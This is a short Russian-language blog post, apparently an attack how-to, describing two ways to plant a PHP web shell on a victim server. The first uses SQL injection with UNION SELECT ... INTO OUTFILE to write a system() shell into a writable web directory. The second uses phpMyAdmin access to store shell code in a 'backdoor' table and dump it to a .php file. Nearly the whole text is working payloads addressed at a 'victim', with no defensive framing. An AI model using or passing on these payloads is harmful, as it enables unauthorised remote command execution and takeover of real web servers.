Два способа заливки шелла - через phpmyadmin и через MySQL
Залить шелл средствами MySQL
1. Ищем на Web-сервере директории, доступные для записи. Заветный каталог может присутствовать в этом списке:/templates_compiled/
/templates_c/
/templates/
/temporary/
/images/
/cache/
/temp/
/files/2. Учитывая, что мы уже подобрали колонки (допустим, их будет 4), выполняем запрос:
UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --3. Пользуемся шеллом по адресу http://victim.com/temp/c.php.
Залить шелл средствами PhpMyAdmin
1. Каким-либо образом получаем доступ к PhpMyAdmin.2. Для эстетики и удобства создаем новую базу:
CREATE DATABASE 'backdoor'3. Ищем установочный путь базы
SELECT @@datadir> C:\AppServ\MySQL\data\4. Выполняем запрос на создание таблицы:
CREATE TABLE backdoor(
Stack TEXT
) TYPE=MYISaM;
INSERT INTO backdoor(Stack)
VALUES(
'<pre><body bgcolor=silver<? @system($_REQUEST["v"]); ?></body></pre>5. Отдаем команду на дамп содержимого таблицы в файл
SELECT * into dumpfile 'C:\AppServ\www\s.php' from backdoor;6. Получаем шелл по адресу victim.com/s.php?v=команда
Комментариев нет:
Отправить комментарий